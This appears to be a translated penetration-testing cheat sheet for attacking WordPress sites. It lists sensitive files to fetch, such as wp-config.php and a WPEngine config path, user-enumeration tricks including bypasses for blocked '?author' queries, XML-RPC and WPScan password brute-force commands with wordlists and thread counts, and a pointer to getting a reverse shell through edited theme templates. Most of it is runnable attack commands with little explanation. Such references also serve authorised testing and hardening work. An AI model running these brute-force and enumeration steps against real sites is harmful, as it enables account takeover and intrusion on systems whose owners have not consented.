# Usernames can be guessed on WordPress because the login form returns a different error message when the username does not exist.
# Interesting files
https://monsite.com/robots.txt
https://monsite.com/feed
https://monsite.com/readme.html
https://monsite.com/xmlrpc.php
# Configuration files
https://monsite.com/.htaccess
https://monsite.com/wp-config.php
# Directory listing
https://monsite.com/wp-includes
# XML-RPC attack (https://github.com/1N3/Wordpress-XMLRPC-Brute-Force-Exploit)
# You can bruteforce users
./wp-xml-brute http://target.com/xmlrpc.php passwords.txt username1
# If you can upload files by any means, check /upload or /uploads for your files
# Get WPEngine's config file
/_wpeprivate/config.json
Scanning and enumeration
# Enumerate users
Users can be found using ?author=XXX (iterate over the numeric ID)
# You can also use this
Use /wp-json/wp/v2/users, then iterate over the user IDs: /wp-json/wp/v2/users/1, /wp-json/wp/v2/users/2, ...
# If /?author=1 is 403 Forbidden, you can bypass it
# If the .htaccess blocks "?author"
# Bypass 1 : http://xxx.fr/?x&author=1 --> http://xxx.fr/author/chris/?x
# Bypass 2 : http://lictor.fr/index.php?author=1
# Another way
/wp-json/?rest_route=/wp/v2/users
# WPScan is a great automated tool (it can also be run in Docker)
docker pull wpscanteam/wpscan
docker run -it --rm wpscanteam/wpscan -u https://yourblog.com [options]
# Non-intrusive scan
wpscan.rb --url www.example.com
# Bruteforce the users found, using 50 threads
wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50
# Bruteforce a single user
wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin
# Plugins enumeration
wpscan.rb --url www.example.com --enumerate p
# Users enumeration
wpscan.rb --url www.example.com --enumerate u
Reverse Shell
# You can get a reverse shell by editing theme templates (404.php, footer.php, ...)